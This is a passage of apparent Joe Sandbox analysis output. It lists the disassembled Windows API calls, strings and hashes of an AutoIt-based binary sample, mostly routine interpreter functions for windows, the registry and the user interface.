• VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00346D97
• _wcscat.LIBCMT ref: 00346DE0
• _wcscat.LIBCMT ref: 00346DE7
• _wcsncpy.LIBCMT ref: 00346E12
Strings
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
• String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
• API String ID: 699586101-1459072770
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0031A939
• GetSystemMetrics.USER32(00000007), ref: 0031A941
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0031A96C
• GetSystemMetrics.USER32(00000008), ref: 0031A974
• GetSystemMetrics.USER32(00000004), ref: 0031A999
• SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0031A9B6
• AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0031A9C6
• CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0031A9F9
• SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0031AA0D
• GetClientRect.USER32(00000000,000000FF), ref: 0031AA2B
• GetStockObject.GDI32(00000011), ref: 0031AA47
• SendMessageW.USER32(00000000,00000030,00000000), ref: 0031AA52
  • Part of subcall function 0031B63C: GetCursorPos.USER32(000000FF), ref: 0031B64F
  • Part of subcall function 0031B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0031B66C
  • Part of subcall function 0031B63C: GetAsyncKeyState.USER32(00000001), ref: 0031B691
  • Part of subcall function 0031B63C: GetAsyncKeyState.USER32(00000002), ref: 0031B69F
• SetTimer.USER32(00000000,00000000,00000028,0031AB87), ref: 0031AA79
Strings
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00363735
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0039DC00,00000000,?,00000000,?,?), ref: 003637A3
• RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003637EB
• RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00363874
• RegCloseKey.ADVAPI32(?), ref: 00363B94
• RegCloseKey.ADVAPI32(00000000), ref: 00363BA1
Strings
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 536824911-966354055
APIs
• CharUpperBuffW.USER32(?,?), ref: 00366C56
• SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00366D16
Strings
Similarity
• API ID: BuffCharMessageSendUpper
• String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
• API String ID: 3974292440-719923060
APIs
• GetClassNameW.USER32(?,?,00000100), ref: 0033CF91
• __swprintf.LIBCMT ref: 0033D032
• _wcscmp.LIBCMT ref: 0033D045
• SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0033D09A
• _wcscmp.LIBCMT ref: 0033D0D6
• GetClassNameW.USER32(?,?,00000400), ref: 0033D10D
• GetDlgCtrlID.USER32(?), ref: 0033D15F
• GetWindowRect.USER32(?,?), ref: 0033D195
• GetParent.USER32(?), ref: 0033D1B3
• ScreenToClient.USER32(00000000), ref: 0033D1BA
• GetClassNameW.USER32(?,?,00000100), ref: 0033D234
• _wcscmp.LIBCMT ref: 0033D248
• GetWindowTextW.USER32(?,?,00000400), ref: 0033D26E
• _wcscmp.LIBCMT ref: 0033D282
Strings
Similarity
• API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
• String ID: %s%u
• API String ID: 3119225716-679674701
APIs
• GetClassNameW.USER32(00000008,?,00000400), ref: 0033D8EB
• _wcscmp.LIBCMT ref: 0033D8FC
• GetWindowTextW.USER32(00000001,?,00000400), ref: 0033D924
• CharUpperBuffW.USER32(?,00000000), ref: 0033D941
• _wcscmp.LIBCMT ref: 0033D95F
• _wcsstr.LIBCMT ref: 0033D970
• GetClassNameW.USER32(00000018,?,00000400), ref: 0033D9A8
• _wcscmp.LIBCMT ref: 0033D9B8
• GetWindowTextW.USER32(00000002,?,00000400), ref: 0033D9DF
• GetClassNameW.USER32(00000018,?,00000400), ref: 0033DA28
• _wcscmp.LIBCMT ref: 0033DA38
• GetClassNameW.USER32(00000010,?,00000400), ref: 0033DA60
• GetWindowRect.USER32(00000004,?), ref: 0033DAC9
Strings
                                                                            Similarity
                                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                            • String ID: @$ThumbnailClass
                                                                            • API String ID: 1788623398-1539354611
                                                                            • Opcode ID: 7447e26b291e81f4870077056feee060eccab2fa4cd35d50c0be802a1f75b10f
                                                                            • Instruction ID: d981159e83e6a697ffe27c9e552ec0e053d4b76423c65d0cdcee5a0c2b3e9306
                                                                            • Opcode Fuzzy Hash: 7447e26b291e81f4870077056feee060eccab2fa4cd35d50c0be802a1f75b10f
                                                                            • Instruction Fuzzy Hash: B781C3710083059BDB06DF10E9C5FAA7BE8FF84714F0584A9FD8A9A096DB30DD45CBA1
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
• API String ID: 1038674560-1810252412
• Opcode ID: 14a1944bd7c006da75a59ba308fdab9023a37ca97570166db1e163e21db11d1b
• Instruction ID: f389591748a865e2d7684954a3963432dfd1b6f6f66305360daaa913a33abf5e
• Opcode Fuzzy Hash: 14a1944bd7c006da75a59ba308fdab9023a37ca97570166db1e163e21db11d1b
• Instruction Fuzzy Hash: 87318D71644305AADB1BFF60EEA3EEEB3A89F20704F200229F541794D5EF61AE14C655
APIs
• LoadIconW.USER32(00000063), ref: 0033EAB0
• SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0033EAC2
• SetWindowTextW.USER32(?,?), ref: 0033EAD9
• GetDlgItem.USER32(?,000003EA), ref: 0033EAEE
• SetWindowTextW.USER32(00000000,?), ref: 0033EAF4
• GetDlgItem.USER32(?,000003E9), ref: 0033EB04
• SetWindowTextW.USER32(00000000,?), ref: 0033EB0A
• SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0033EB2B
• SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0033EB45
• GetWindowRect.USER32(?,?), ref: 0033EB4E
• SetWindowTextW.USER32(?,?), ref: 0033EBB9
• GetDesktopWindow.USER32 ref: 0033EBBF
• GetWindowRect.USER32(00000000), ref: 0033EBC6
• MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0033EC12
• GetClientRect.USER32(?,?), ref: 0033EC1F
• PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0033EC44
• SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0033EC6F
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
• String ID:
• API String ID: 3869813825-0
• Opcode ID: f8430cc37e69caf297bb30d57cf0331e96a8b339808079d012c4530bdebbc7e7
• Instruction ID: d85b95823d56d9c89443252b0906cd67946628ec955bfac16d805ab926693c7a
• Opcode Fuzzy Hash: f8430cc37e69caf297bb30d57cf0331e96a8b339808079d012c4530bdebbc7e7
• Instruction Fuzzy Hash: 62513D71900709AFDB229FA8DD89F6EBBF9FF04705F014918E686A65E0D774A944CB10
APIs
• LoadCursorW.USER32(00000000,00007F8A), ref: 003579C6
• LoadCursorW.USER32(00000000,00007F00), ref: 003579D1
• LoadCursorW.USER32(00000000,00007F03), ref: 003579DC
• LoadCursorW.USER32(00000000,00007F8B), ref: 003579E7
• LoadCursorW.USER32(00000000,00007F01), ref: 003579F2
• LoadCursorW.USER32(00000000,00007F81), ref: 003579FD
• LoadCursorW.USER32(00000000,00007F88), ref: 00357A08
• LoadCursorW.USER32(00000000,00007F80), ref: 00357A13
• LoadCursorW.USER32(00000000,00007F86), ref: 00357A1E
• LoadCursorW.USER32(00000000,00007F83), ref: 00357A29
• LoadCursorW.USER32(00000000,00007F85), ref: 00357A34
• LoadCursorW.USER32(00000000,00007F82), ref: 00357A3F
• LoadCursorW.USER32(00000000,00007F84), ref: 00357A4A
• LoadCursorW.USER32(00000000,00007F04), ref: 00357A55
• LoadCursorW.USER32(00000000,00007F02), ref: 00357A60
• LoadCursorW.USER32(00000000,00007F89), ref: 00357A6B
• GetCursorInfo.USER32(?), ref: 00357A7B
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Cursor$Load$Info
• String ID:
• API String ID: 2577412497-0
• Opcode ID: 04c76a6ab4c3680a74a1eda09e9ce9d704e4800364af95f045c33fa5fcfe482d
• Instruction ID: 2ca10c494a562a2daf5394f46926b6fbebf542b2171fadde68353cb948bdfc66
• Opcode Fuzzy Hash: 04c76a6ab4c3680a74a1eda09e9ce9d704e4800364af95f045c33fa5fcfe482d
• Instruction Fuzzy Hash: 4E3127B0D0831A6ADB119FB69C89D9FBFECFF04750F50452AE50DE7280DA78A5048FA1
APIs
  • Part of subcall function 0031E968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0030C8B7,?,00002000,?,?,00000000,?,0030419E,?,?,?,0039DC00), ref: 0031E984
  • Part of subcall function 0030660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003053B1,?,?,003061FF,?,00000000,00000001,00000000), ref: 0030662F
• __wsplitpath.LIBCMT ref: 0030C93E
  • Part of subcall function 00321DFC: __wsplitpath_helper.LIBCMT ref: 00321E3C
• _wcscpy.LIBCMT ref: 0030C953
• _wcscat.LIBCMT ref: 0030C968
• SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0030C978
• SetCurrentDirectoryW.KERNEL32(?), ref: 0030CABE
  • Part of subcall function 0030B337: _wcscpy.LIBCMT ref: 0030B36F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
• String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
• API String ID: 2258743419-1018226102
• Opcode ID: 64b6e4f3b907f48b3032777fbc24f6aae141181d61f1ddd8f58d9ca1f7e31dc8
• Instruction ID: ff6eb2d7f52120b1708828e21fbe6edd2d2ac9b95fc8075ae816113cb0c23427
• Opcode Fuzzy Hash: 64b6e4f3b907f48b3032777fbc24f6aae141181d61f1ddd8f58d9ca1f7e31dc8
• Instruction Fuzzy Hash: 4312D3715093419FC726EF24C891AAFBBE8FF89300F40491EF5899B291DB30DA49DB52
APIs
• _memset.LIBCMT ref: 0036CEFB
• DestroyWindow.USER32(?,?), ref: 0036CF73
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0036CFF4
• SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0036D016
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0036D025
• DestroyWindow.USER32(?), ref: 0036D042
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00300000,00000000), ref: 0036D075
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0036D094
• GetDesktopWindow.USER32 ref: 0036D0A9
• GetWindowRect.USER32(00000000), ref: 0036D0B0
• SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0036D0C2
• SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0036D0DA
  • Part of subcall function 0031B526: GetWindowLongW.USER32(?,000000EB), ref: 0031B537
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
• String ID: 0$tooltips_class32
• API String ID: 3877571568-3619404913
• Opcode ID: ddd9fabbb3819ccacf03709c92390e598849118e748cd31295f429407d850816
• Instruction ID: c9e67ee1021d9136b99e02a0abf5803478c802fbfa2df3fb939bdb8b7344cb65
• Opcode Fuzzy Hash: ddd9fabbb3819ccacf03709c92390e598849118e748cd31295f429407d850816
• Instruction Fuzzy Hash: 8B71E0B0640305AFD722CF28CC85FA677E9FB89708F04851DF9858B2A1D730E842DB22
APIs
  • Part of subcall function 0031B34E: GetWindowLongW.USER32(?,000000EB), ref: 0031B35F
• DragQueryPoint.SHELL32(?,?), ref: 0036F37A
  • Part of subcall function 0036D7DE: ClientToScreen.USER32(?,?), ref: 0036D807
  • Part of subcall function 0036D7DE: GetWindowRect.USER32(?,?), ref: 0036D87D
  • Part of subcall function 0036D7DE: PtInRect.USER32(?,?,0036ED5A), ref: 0036D88D
• SendMessageW.USER32(?,000000B0,?,?), ref: 0036F3E3
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0036F3EE
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0036F411
• _wcscat.LIBCMT ref: 0036F441
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0036F458
• SendMessageW.USER32(?,000000B0,?,?), ref: 0036F471
• SendMessageW.USER32(?,000000B1,?,?), ref: 0036F488
• SendMessageW.USER32(?,000000B1,?,?), ref: 0036F4AA
• DragFinish.SHELL32(?), ref: 0036F4B1
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0036F59C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 169749273-3440237614
• Opcode ID: e32dd89b96e9ad6ecd48273437d4e4e6e38791a299931edc9e9b6a26e2494e58
• Instruction ID: a91c06b7aa9770d5615a576a753a1d82d8d21e36a09ddebc958a747b743faa5c
• Opcode Fuzzy Hash: e32dd89b96e9ad6ecd48273437d4e4e6e38791a299931edc9e9b6a26e2494e58
• Instruction Fuzzy Hash: 07614871108304AFC302EF64DC85E9BBBE8EF89714F404A1EF695961A1DB71AA19CB52
APIs
• VariantInit.OLEAUT32(00000000), ref: 0034AB3D
• VariantCopy.OLEAUT32(?,?), ref: 0034AB46
• VariantClear.OLEAUT32(?), ref: 0034AB52
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0034AC40
• __swprintf.LIBCMT ref: 0034AC70
• VarR8FromDec.OLEAUT32(?,?), ref: 0034AC9C
• VariantInit.OLEAUT32(?), ref: 0034AD4D
• SysFreeString.OLEAUT32(00000016), ref: 0034ADDF
• VariantClear.OLEAUT32(?), ref: 0034AE35
• VariantClear.OLEAUT32(?), ref: 0034AE44
• VariantInit.OLEAUT32(00000000), ref: 0034AE80
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 3730832054-3931177956
• Opcode ID: e181e07c9ed35c72f96e5b6ed08c1874ad0d269615ae87fdbdb61da474073b32
• Instruction ID: 9a0c4653f452bb8fb21a7982f7dae60f53e6d95d4b0fdc46191019128f04aaf6
• Opcode Fuzzy Hash: e181e07c9ed35c72f96e5b6ed08c1874ad0d269615ae87fdbdb61da474073b32
• Instruction Fuzzy Hash: 78D1EA31A40A15EBDF269F65D885BAAB7F9FF08700F148455E4059F6A1CB34BC80DBA3
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?), ref: 003671FC
                                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00367247
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharMessageSendUpper
                                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                            • API String ID: 3974292440-4258414348
                                                                            • Opcode ID: 98e76228bd1aba08c8178ea7b7eb5ae9c2df14c7a9e28b1023db5c71f7ec57d8
                                                                            • Instruction ID: ef48f51fb69c77790a1a179ca89860bf799e8d0db0adba2f35a5e9a238e9b6ba
                                                                            • Opcode Fuzzy Hash: 98e76228bd1aba08c8178ea7b7eb5ae9c2df14c7a9e28b1023db5c71f7ec57d8
                                                                            • Instruction Fuzzy Hash: 169171342047019BCB07EF10C851AAEB7A5AF98314F508859FD966F7A7DB31ED4ACB81
                                                                            APIs
                                                                            • EnumChildWindows.USER32(?,0033CF50), ref: 0033CE90
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ChildEnumWindows
                                                                            • String ID: 4+;$CLASS$CLASSNN$H+;$INSTANCE$L+;$NAME$P+;$REGEXPCLASS$T+;$TEXT
                                                                            • API String ID: 3555792229-1971344045
                                                                            • Opcode ID: 6ad3862b2714de4c842e57d66406c8055345cc0fc8e66e6e394c4752313e9cc1
                                                                            • Instruction ID: 41fef8279d018fd5515ce0d75dc1892bbb2cc591a8e4153ba05cc957f95e2fe5
                                                                            • Opcode Fuzzy Hash: 6ad3862b2714de4c842e57d66406c8055345cc0fc8e66e6e394c4752313e9cc1
                                                                            • Instruction Fuzzy Hash: 9591A370610606ABCB1AEF60C8D1BEEFB75BF04304F509519E959BB191DF30699ACBD0
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0036E5AB
                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0036BEAF), ref: 0036E607
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0036E647
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0036E68C
                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0036E6C3
                                                                            • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0036BEAF), ref: 0036E6CF
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0036E6DF
                                                                            • DestroyIcon.USER32(?,?,?,?,?,0036BEAF), ref: 0036E6EE
                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0036E70B
                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0036E717
                                                                              • Part of subcall function 00320FA7: __wcsicmp_l.LIBCMT ref: 00321030
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                            • String ID: .dll$.exe$.icl
                                                                            • API String ID: 1212759294-1154884017
                                                                            • Opcode ID: 00bc52938de1586596192f46aefbd5556dbe239041f7839d9ae086f120151bd1
                                                                            • Instruction ID: 3ae42709ce088f20048a63a5778e8023c544e4099c35b1c72cfcecb98910f687
                                                                            • Opcode Fuzzy Hash: 00bc52938de1586596192f46aefbd5556dbe239041f7839d9ae086f120151bd1
                                                                            • Instruction Fuzzy Hash: 6061C171540225BAEB16DF64DC46FFE77ACBB19724F108105F915EA0D1EB70D984CBA0
                                                                            APIs
                                                                              • Part of subcall function 0030936C: __swprintf.LIBCMT ref: 003093AB
                                                                              • Part of subcall function 0030936C: __itow.LIBCMT ref: 003093DF
                                                                            • CharLowerBuffW.USER32(?,?), ref: 0034D292
                                                                            • GetDriveTypeW.KERNEL32 ref: 0034D2DF
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0034D327
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0034D35E
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0034D38C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                             • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                             • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 1148790751-4113822522
                                                                            • Opcode ID: b034d41c1e5835010cba59c6a20d32977a647629e74143944d915b8435f5522b
                                                                            • Instruction ID: d14a45f8700cee0531e7bb5f7fe7f8ee13ab5b5cc666602bc104f21c469f5d30
                                                                            • Opcode Fuzzy Hash: b034d41c1e5835010cba59c6a20d32977a647629e74143944d915b8435f5522b
                                                                            • Instruction Fuzzy Hash: 69513C752043059FC706EF10C8919AEB7E8FF98758F10895DF8966B2A1DB31EE05CB92
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00373973,00000016,0000138C,00000016,?,00000016,0039DDB4,00000000,?), ref: 003426F1
                                                                            • LoadStringW.USER32(00000000,?,00373973,00000016), ref: 003426FA
                                                                            • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00373973,00000016,0000138C,00000016,?,00000016,0039DDB4,00000000,?,00000016), ref: 0034271C
                                                                            • LoadStringW.USER32(00000000,?,00373973,00000016), ref: 0034271F
                                                                            • __swprintf.LIBCMT ref: 0034276F
                                                                            • __swprintf.LIBCMT ref: 00342780
                                                                            • _wprintf.LIBCMT ref: 00342829
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00342840
                                                                            Strings
                                                                            Memory Dump Source
